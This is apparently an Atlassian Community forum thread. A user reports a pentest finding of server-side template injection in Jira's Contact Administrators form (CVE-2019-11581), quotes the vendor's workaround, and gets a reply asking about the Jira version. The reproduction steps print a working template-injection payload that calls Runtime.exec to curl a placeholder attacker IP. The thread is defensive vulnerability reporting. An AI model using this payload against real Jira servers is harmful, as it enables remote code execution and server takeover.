Contact Administrator Form in Jira| Vulnerability Server-Side Template Injection

Muthu Praveen
I'm New Here
I'm New Here
Those new to the Atlassian Community have posted less than three times. Give them a warm welcome!
January 30, 2024

 

We have one Vulnerablitiy reported during the pentest: Server-Side Template Injection 

Steps to Reproduce:
1. Navigate to "https://*.com/jira/secure/ContactAdministrators!default.jspa"
2. Insert a template injection payload “$i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null
).exec('curl http://<AttackerIP>/rcetest?a=a').waitFor()” in the Subject field which requests for a connection back to the attacker machine by issuing a “Curl” command and click on "Send"
3. Upon successful response we can observe that the server is making connections back to the attacker controlled server which can lead to full control of the web server.

 

From the finding we saw that it was related to the below. Attlasian has mentioned this will fixed in 9.4.x version
https://community.atlassian.com/t5/Jira-Software-articles/CVE-2019-11581-Critical-Security-Advisory-for-Jira-Server-and/ba-p/1128241

As per the recent pentest we found this issue is still existing. In the above article they have given the mitigation steps for this issue.

Does anyone know the impact by doing the Workaround below?

Mitigation Steps
If you are unable to upgrade Jira immediately, then as a temporary workaround, you can:

Disable the Contact Administrators Form; and
Block these endpoints from being accessed:
- /secure/admin/SendBulkMail!default.jspa ,
- /admin/SendBulkMail!default.jspa , and
- /SendBulkMail!default.jspa .
Note that blocking the SendBulkMail endpoint will prevent Jira Administrators from being able to send bulk emails to users.
This can be achieved by denying access in the reverse-proxy, load balancer, or Tomcat directly (see the KB: How to block access to a specific URL at Tomcat).
After upgrading Jira to a fixed version, you can re-enable the Administrator Contact Form, and unblock the SendBulkMail endpoints.

1 answer

0 votes
Mirek
Community Leader
Community Leader
Community Leaders are connectors, ambassadors, and mentors. On the online community, they serve as thought leaders, product experts, and moderators.
January 31, 2024

Hi @Muthu Praveen 

Just to be clear.. Are you saying that you upgraded Jira to version 9.4 (or having that version) and this is still a problem? 

Basically it is pretty old issue so if you are on newer version that it was recommended that it should be already addressed without the need to apply the workaround.. 

Suggest an answer

Log in or Sign up to answer